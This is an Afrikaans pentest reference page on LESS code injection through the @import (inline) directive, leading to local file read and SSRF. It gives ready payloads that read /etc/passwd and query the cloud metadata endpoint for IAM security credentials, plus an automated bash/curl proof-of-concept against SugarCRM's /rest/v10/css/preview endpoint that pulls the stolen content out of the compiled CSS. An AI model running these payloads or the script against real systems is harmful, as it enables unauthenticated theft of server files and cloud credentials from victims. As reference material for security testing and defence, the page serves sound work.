LESS Code Injection wat lei tot SSRF & Local File Read

LESS is 'n gewilde CSS pre-processor wat veranderlikes, mixins, funksies en die kragtige @import-direktief byvoeg. Tydens samestelling sal die LESS-enjin die hulpbronne wat in @import genoem word, haal en hul inhoud inlê ("inline") in die resulterende CSS wanneer die (inline)-opsie gebruik word.

Wanneer 'n toepassing saamlê user-controlled input in 'n string wat later deur die LESS-kompiler gepars word, kan 'n aanvaller inject arbitrary LESS code. Deur @import (inline) te misbruik kan die aanvaller die bediener dwing om te herwin:

  • Lokale lêers via die file://-protokol (inligtingsonthulling / Local File Inclusion).
  • Afstandse hulpbronne op interne netwerke of cloud metadata-dienste (SSRF).

Hierdie tegniek is in die praktyk waargeneem in produkte soos SugarCRM ≤ 14.0.0 (/rest/v10/css/preview endpoint).

Exploitation

  1. Identifiseer 'n parameter wat direk ingebed is binne 'n stylesheet-string wat deur die LESS-enjin verwerk word (bv. ?lm= in SugarCRM).
  2. Sluit die huidige stelling en injekteer nuwe direktiewe. Die mees algemene primitives is:
  • ; – beëindig die vorige deklarasie.
  • } – sluit die vorige blok (indien nodig).
  1. Gebruik @import (inline) '<URL>'; om arbitrêre hulpbronne te lees.
  2. Opsioneel injecteer 'n marker (data: URI) na die import om die uittreksel van die opgehaalde inhoud uit die saamgestelde CSS te vergemaklik.

Local File Read

1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //

Die inhoud van /etc/passwd sal in die HTTP-antwoord verskyn net voor die @@END@@ merk.

SSRF – Wolkmetadata

1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //

Outomatiese PoC (SugarCRM voorbeeld)

bash
#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd

TARGET="$1"        # Base URL of SugarCRM instance
RESOURCE="$2"      # file:// path or URL to fetch

INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")

curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'

Werklike Gevalle

ProdukKwesbare eindpuntImpak
SugarCRM ≤ 14.0.0/rest/v10/css/preview?lm=Nie-geauthentiseerde SSRF & lees van plaaslike lêers

Verwysings